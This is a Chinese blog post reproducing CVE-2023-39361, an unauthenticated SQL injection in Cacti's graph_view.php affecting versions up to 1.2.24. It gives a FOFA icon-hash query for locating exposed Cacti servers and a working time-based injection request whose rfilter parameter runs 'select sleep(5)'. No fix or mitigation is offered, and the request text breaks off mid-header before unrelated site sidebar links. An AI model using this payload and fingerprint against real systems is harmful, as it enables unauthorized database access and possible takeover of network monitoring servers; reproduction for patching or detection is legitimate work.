Cacti 前台SQL注入漏洞复现(CVE-2023-39361)

0x01 产品简介

Cacti 是一套基于 PHP,MySQL,SNMP 及 RRDTool 开发的网络流量监测图形分析工具。

0x02 漏洞概述

该漏洞存在于graph_view.php文件中。默认情况下,访客用户无需身份验证即可访问graph_view.php,在启用情况下使用时会导致SQL注入漏洞。

攻击者可能利用此漏洞执行远程代码或篡夺管理权限。Growth_right_pane_tree函数包含从graph_view.php文件调用的漏洞。在tree_content情况下,用户输入通过html_validate_tree_vars函数进行验证。如果tree_id参数大于0,则调用grow_right_pane_tree函数。

0x03 影响范围

Cacti <= 1.2.24

0x04 复现环境

FOFA:icon_hash="-1797138069"

0x05 漏洞复现

PoC

GET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3d%22%28%28%22%29%29%3bselect+sleep%285%29%3b--+- HTTP/1.1
Host: your-ip
User

最近更新

  1. TCP协议是安全的吗?

    2024-01-22 06:24:03       16 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-01-22 06:24:03       16 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-01-22 06:24:03       15 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-01-22 06:24:03       18 阅读

热门阅读

  1. Conan: starting at a text book Hello World

    2024-01-22 06:24:03       32 阅读
  2. logback排除指定包类方法的日志

    2024-01-22 06:24:03       33 阅读
  3. 配置ansible自动化工具

    2024-01-22 06:24:03       27 阅读
  4. React:构建用户界面的强大工具

    2024-01-22 06:24:03       26 阅读
  5. 102.二叉树的层序遍历

    2024-01-22 06:24:03       30 阅读
  6. Django中解决跨域问题

    2024-01-22 06:24:03       37 阅读
  7. 网络安全B模块(笔记详解)- Apache安全配置

    2024-01-22 06:24:03       35 阅读
  8. 【leetcode100-044到050】【二叉树】七题合集

    2024-01-22 06:24:03       35 阅读